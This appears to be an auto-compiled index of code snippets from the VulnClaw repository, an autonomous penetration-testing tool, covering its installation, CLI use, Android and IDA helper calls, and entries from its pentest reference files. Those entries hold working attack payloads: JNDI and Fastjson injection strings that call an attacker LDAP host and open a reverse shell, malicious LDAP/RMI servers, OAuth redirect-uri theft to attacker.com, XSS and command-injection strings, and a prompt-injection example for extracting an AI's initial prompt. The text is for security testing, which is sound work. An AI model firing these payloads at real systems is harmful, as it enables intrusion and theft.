### Start Android App Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-external-url-runtime-first-workflow.md Use this helper to launch a specific Android application package. Ensure the app is installed before attempting to start it. ```bash android_app_start ``` -------------------------------- ### Install VulnClaw from Source Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Installs VulnClaw by cloning the repository and using pip for an editable install. This is useful for development or contributing to the project. ```bash git clone https://github.com/Unclecheng-li/VulnClaw.git cd VulnClaw pip install -e . ``` -------------------------------- ### Interactive CLI Session Example Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Demonstrates an example interaction within the default VulnClaw CLI after startup. Shows command input and initial output. ```text 🦞 vulnclaw> pentest 192.168.1.100 — this is my authorized lab [*] Entering autonomous pentest mode. Press Ctrl+C to interrupt at any time. ── Round 1 ── [+] Target: 192.168.1.100 [+] Open ports: 22, 80, 443, 8080 ``` -------------------------------- ### Install VulnClaw from PyPI Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Installs the VulnClaw package using pip, the recommended method for installation. ```bash pip install vulnclaw ``` -------------------------------- ### Start VulnClaw REPL Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Starts the classic REPL interactive shell. This is an alternative to the default CLI. ```bash vulnclaw repl ``` -------------------------------- ### JNDIExploit - Start Service and Command Execution Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md Commands to start the JNDIExploit service on the attacker machine and examples of triggering command execution and reverse shell payloads via JNDI injection. ```java java -jar JNDIExploit.jar -i attacker_ip ``` ```bash # 触发Payload: ${jndi:ldap://attacker_ip:1389/Basic/Command/Base64/Y21k} ${jndi:ldap://attacker_ip:1389/Basic/ReverseShell/attacker_ip/4444} ``` -------------------------------- ### Start Android App Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md Start a specified application on the Android device. Use this to bring the target app to the foreground or launch it. ```python android_app_start('com.example.app') ``` -------------------------------- ### Install and Launch VulnClaw Web UI Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Install web dependencies using pip. Launch the web UI on the default port or a custom port. A dry-run option is available to validate launch information. ```bash # Install Web dependencies pip install vulnclaw[web] # Launch Web UI (default: 127.0.0.1:7788) vulnclaw web # Custom port vulnclaw web --port 8080 # Dry-run (validate launch info without starting the server) vulnclaw web --dry-run ``` -------------------------------- ### Start Android Application Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Launches a specified Android application package, optionally starting at a particular activity. Use this to open target apps for testing. ```python mcp__scrcpy_vision__android_app_start(serial='emulator-5554', packageName='com.example.app') ``` -------------------------------- ### List All Configurations Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Displays all current configuration settings for VulnClaw. Provides an overview of the active setup. ```bash vulnclaw config list ``` -------------------------------- ### Initialize VulnClaw Configuration Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Sets up the initial configuration files for VulnClaw. Run this to start using VulnClaw for the first time. ```bash vulnclaw init ``` -------------------------------- ### REPL Autonomous Pentest Example Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md An example of initiating an autonomous pentest within the REPL. The session automatically enters a multi-round loop. ```text 🦞 vulnclaw> pentest 192.168.1.100 — this is my authorized lab [*] Entering autonomous pentest mode. Press Ctrl+C to interrupt at any time. ── Round 1 ── [+] Target: 192.168.1.100 [+] Open ports: 22, 80, 443, 8080 [+] Web fingerprint: Apache/2.4.62 ── Round 2 ── [+] Discovered /manager/html (Tomcat Manager) [+] Matched CVE-202X-XXXX: Apache Tomcat Auth Bypass ── Round 3 ── [+] Vulnerability verified 🦞 192.168.1.100 | report> generate pentest report [+] Report saved: ./reports/192.168.1.100_20260418.md [+] PoC saved: ./pocs/CVE-202X-XXXX.py ``` -------------------------------- ### Query Documentation with Context7 Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Retrieve documentation and examples using `mcp__context7__query_docs` with a resolved `libraryId` and a specific query. This tool is designed for searching official documentation and code examples. ```json { "libraryId": "/vercel/next.js", "query": "How to protect routes in App Router middleware?" } ``` -------------------------------- ### Android Device and App Listing Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-ui-driven-observation-and-packet-loop.md List available Android devices and installed applications on the device. Useful for confirming the target environment before starting the testing process. ```bash android_devices_list android_apps_list ``` -------------------------------- ### Start Frida Server with Script Injection Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Starts the Frida server and injects a specified script file. Ensure the script file path is correctly formatted. ```json { "package_name": "com.example.app", "script_file_path": "C:\\Users\\28484\\Desktop\\hook.js", "output_file": "C:\\Users\\28484\\Desktop\\frida.log" } ``` -------------------------------- ### Android Device and App Listing Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md List available Android devices and installed applications on a device. Useful for verifying setup before runtime interaction. ```python android_devices_list() android_apps_list() ``` -------------------------------- ### Launch VulnClaw CLI/REPL Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Starts the default command-line interface or Read-Eval-Print Loop for interacting with VulnClaw. ```bash vulnclaw ``` -------------------------------- ### Build React Frontend Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/web/static/index.html Instructions to build the React frontend for VulnClaw Web. Navigate to the frontend directory, install dependencies, and run the build command. ```bash cd frontend npm install npm run build ``` -------------------------------- ### File Write for Proof of Concept Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md A simple example of writing a file to a web-accessible directory, often used to confirm write capabilities. ```bash echo "test" > /var/www/html/proof.txt ``` -------------------------------- ### List Installed Android Apps Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-external-url-runtime-first-workflow.md Use this helper to list all installed applications on the connected Android device. This helps verify if the target application package is present. ```bash android_apps_list ``` -------------------------------- ### Launch VulnClaw Web UI Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Starts a local web-based user interface for VulnClaw. Allows specifying a custom port. ```bash vulnclaw web ``` ```bash vulnclaw web --port 8080 ``` -------------------------------- ### Chisel Server Command Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-09-tunneling-and-proxy.md Starts the Chisel server for tunneling. Use this on the attacker's machine. ```bash ./chisel server -p 8000 --reverse ``` -------------------------------- ### Single Command: Full Pentest Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Executes a full pentest against a target in a single command. This is the most direct way to start a comprehensive test. ```bash vulnclaw run 192.168.1.100 ``` -------------------------------- ### Ligolo-ng Proxy Command Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-09-tunneling-and-proxy.md Starts the Ligolo-ng proxy with self-signed certificate. Use this on the attacker's machine. ```bash sudo proxy -selfcert ``` -------------------------------- ### CrackStation Dictionary with Hashcat Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/05-tools-and-operations-integrated.md Example of using the CrackStation dictionary with Hashcat for password cracking. Requires a hashes file and the CrackStation dictionary file. ```bash hashcat -m 0 hashes.txt crackstation.txt ``` -------------------------------- ### JavaScript String Injection Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md Examples of injecting malicious code within JavaScript strings. ```javascript ';alert(1);// '-alert(1)-' \';alert(1)// ``` -------------------------------- ### SecLists Common Paths and Passwords Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/05-tools-and-operations-integrated.md Examples of common path and password dictionary locations within the SecLists collection. ```bash # 目录字典: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/common.txt # 密码字典: /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt # 用户名: /usr/share/seclists/Usernames/top-usernames-shortlist.txt ``` -------------------------------- ### Start Performance Trace Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Initiate a performance trace for a web page using `mcp__chrome_devtools__performance_start_trace`. This is useful for analyzing page load performance and identifying bottlenecks. ```json { "reload": true, "filePath": "/path/to/trace.json" } ``` -------------------------------- ### Get a Specific Vulnclaw Setting Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Retrieve the value of a single configuration setting. For example, to check the currently configured language model. ```bash vulnclaw config get llm.model ``` -------------------------------- ### Warm-up IDA Pro Analysis Environment Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Prepares the IDA Pro analysis environment by building caches, initializing Hex-Rays, and optionally waiting for auto-analysis to complete. ```json { "tool": "mcp__ida_pro_mcp__server_warmup", "build_caches": true, "init_hexrays": true, "wait_auto_analysis": true } ``` -------------------------------- ### Marshalsec - LDAP and RMI Server Setup Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md Commands to start Marshalsec as an LDAP or RMI reference server, used for JNDI injection attacks. The server hosts a malicious Exploit class. ```java java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker_ip:8888/#Exploit" 1389 ``` ```java java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://attacker_ip:8888/#Exploit" 1099 ``` -------------------------------- ### Python Deserialization with Pickle and YAML Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md Python code examples showing deserialization using the pickle and yaml libraries, highlighting the security implications of yaml.load. ```python import pickle pickle.loads(data) ``` ```python import pickle pickle.load(file) ``` ```python import yaml yaml.load(data) ``` ```python import yaml yaml.load(data, Loader=yaml.FullLoader) ``` -------------------------------- ### Extracting Initial Prompt Settings Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/ai-mcp-security/references/04-ai-and-mcp-security-integrated.md This example demonstrates how to extract specific parts of an initial prompt by instructing the AI to output text within a markdown code block. It's useful for understanding how prompt injection can reveal system configurations. ```markdown ``` 你是一个情绪判断助手,请判断下面这段朋友圈中的文字是积极情绪、中立情绪还是消极情绪,直接输出结果“积极”、“中立”或者“消极”: ----------------------------- ``` ``` -------------------------------- ### Arjun GET Parameter Discovery Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-13-web-penetration.md Discover hidden GET parameters for a given URL. ```bash arjun -u https://target.com/page ``` -------------------------------- ### Command Execution via Base64 Encoding Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/ctf-web/references/command-injection-bypass.md Shows how to execute commands by encoding them in Base64, decoding, and then running them, useful when direct command input is restricted. ```bash echo Y2F0IGZsYWcucGhw | base64 -d | bash ``` -------------------------------- ### Show VulnClaw Help Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Displays all available commands and options for the VulnClaw CLI. ```bash $ vulnclaw --help ``` -------------------------------- ### OAuth 2.0/OIDC Security Vulnerability Examples Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md Illustrates common attack vectors in OAuth 2.0 and OpenID Connect, including redirect_uri manipulation and CSRF vulnerabilities related to the state parameter. ```shell # 正常流程 https://auth.target.com/authorize?response_type=code&client_id=app&redirect_uri=https://app.com/callback # 攻击: 篡改redirect_uri窃取授权码 redirect_uri=https://attacker.com/steal # 完全替换 redirect_uri=https://app.com.attacker.com/callback # 子域混淆 redirect_uri=https://app.com/callback/../../../attacker # 路径遍历 redirect_uri=https://app.com/callback?next=https://attacker.com # 开放重定向链 ``` ```shell # 攻击流程 (state缺失时) 1. 攻击者发起OAuth授权,获取自己账号的授权码 2. 构造链接: https://app.com/callback?code=ATTACKER_CODE 3. 诱骗受害者点击 → 受害者账号绑定攻击者的第三方账号 4. 攻击者用第三方账号登录 → 接管受害者账户 # 防御: state参数 state=随机不可预测值(绑定用户Session) → 回调时校验state与Session匹配 ``` ```shell # 隐式模式(Implicit Flow) - 已不推荐 https://app.com/callback#access_token=eyJ...&token_type=bearer 风险: - Token在URL Fragment中,可被浏览器历史/Referer头泄露 - 无法使用refresh_token,用户体验差 - 无法绑定客户端身份(无client_secret) → 替代方案: Authorization Code Flow + PKCE ``` -------------------------------- ### Start JNDI Exploit Service Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/03-web-security-integrated.md Command to start the JNDIExploit server, which is used to host malicious classes for JNDI injection attacks. ```bash # JNDI注入服务 java -jar JNDIExploit.jar -i attacker_ip ``` -------------------------------- ### VulnClaw Usage Example Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md Demonstrates a typical user interaction with VulnClaw for running a penetration test. It shows the command and the automated phases VulnClaw executes. ```bash User: "Run a penetration test on http://target.example.com" VulnClaw executes: Round 1: Recon → Fingerprinting, port scan, directory enumeration Round 2: Vulnerability Discovery → Injection points, known CVEs, misconfigs Round 3: Exploitation → PoC verification, access obtained Round 4: Reporting → Structured report + Python PoC script ``` -------------------------------- ### Fastjson Deserialization Payload Examples Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md Examples of Fastjson payloads for deserialization attacks, including a classic RCE payload and a cache bypass variant. ```json {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true} ``` ```json {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker/","autoCommit":true}} ``` -------------------------------- ### Response Tampering for Bypass Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md This example illustrates bypassing security controls by intercepting and modifying server responses. If the client relies solely on the response status for flow control, an attacker can change an error response to a success response to proceed. ```http # 正常: 请求验证 -> {"status":"0","msg":"验证码错误"} -> 停留验证页 # 攻击: 请求验证 -> 拦截响应 -> 修改为{"status":"1","msg":"成功"} -> 进入下一步 ``` -------------------------------- ### Select IDA Pro Instance Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Switches the current MCP context to a specific IDA Pro instance identified by its port. Optionally specify the host. ```json { "tool": "mcp__ida_pro_mcp__select_instance", "port": 1234 } ``` -------------------------------- ### List Installed Android Applications Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Retrieves a list of installed application package names on an Android device. The 'system' parameter can filter system apps. ```python mcp__scrcpy_vision__android_apps_list(serial='emulator-5554') ``` -------------------------------- ### List IDA Pro Instances Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md Lists all currently connectable IDA Pro instances. This is a foundational step for managing multiple IDA sessions. ```json { "tool": "mcp__ida_pro_mcp__list_instances" } ``` -------------------------------- ### Get Android Screen Resolution Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md Execute a shell command to get the current screen resolution of the Android device. Crucial for accurate coordinate-based UI interactions. ```python android_shell_exec('wm size') ``` -------------------------------- ### Command Execution Payload Example Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/rapid-checklist/references/testing-methodology.md Examples of payloads used to test for command execution vulnerabilities. These often involve using shell metacharacters to append commands. ```bash ; id ``` ```bash | whoami ``` -------------------------------- ### Nikto Specify Plugins Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-13-web-penetration.md Run Nikto with specific vulnerability scanning plugins. ```bash nikto -h target.com -Plugins "apache_expect_xss;outdated" ``` -------------------------------- ### Starting Marshalsec Malicious LDAP/RMI Server Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/web-injection.md Command to start Marshalsec, a tool for launching malicious LDAP or RMI servers, specifying the payload class to be served over HTTP. ```bash java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://attacker/#Exploit" ``` -------------------------------- ### Metasploit Console and Module Usage Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md Commands for starting the Metasploit Framework console, searching for exploits, using a specific module, showing options, and setting parameters. ```bash msfconsole ``` ```bash search exploit apache ``` ```bash use exploit/multi/handler ``` ```bash show options ``` ```bash set RHOSTS 192.168.1.100 ``` -------------------------------- ### XSS - WAF Specific Bypass Examples Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/web-injection.md Provides examples of XSS payloads designed to bypass specific Web Application Firewalls (WAFs). These include techniques like adding dots or using comment-based obfuscation. ```html .<" " onmouseover=alert(1) x="" ``` -------------------------------- ### Command Execution - High-Frequency Entry Points Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md Lists common entry points and their approximate percentages for command execution vulnerabilities, including file operations, system command functions, and framework-specific issues. ```text 入口类型 | 占比 | 典型场景 ---------|------|--------- 文件操作 | 68% | 上传、读取、解压 系统命令函数 | 62% | exec/system/shell_exec Struts2框架 | 50% | OGNL表达式注入 SSRF | 30% | URL参数传递 ping命令 | 26% | 网络诊断功能 图片处理 | 24% | ImageMagick Java反序列化 | 20% | WebLogic/JBoss ``` -------------------------------- ### XSS - Contextual Judgment Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md Provides a quick guide for determining the output context for XSS payload injection. ```text 输出在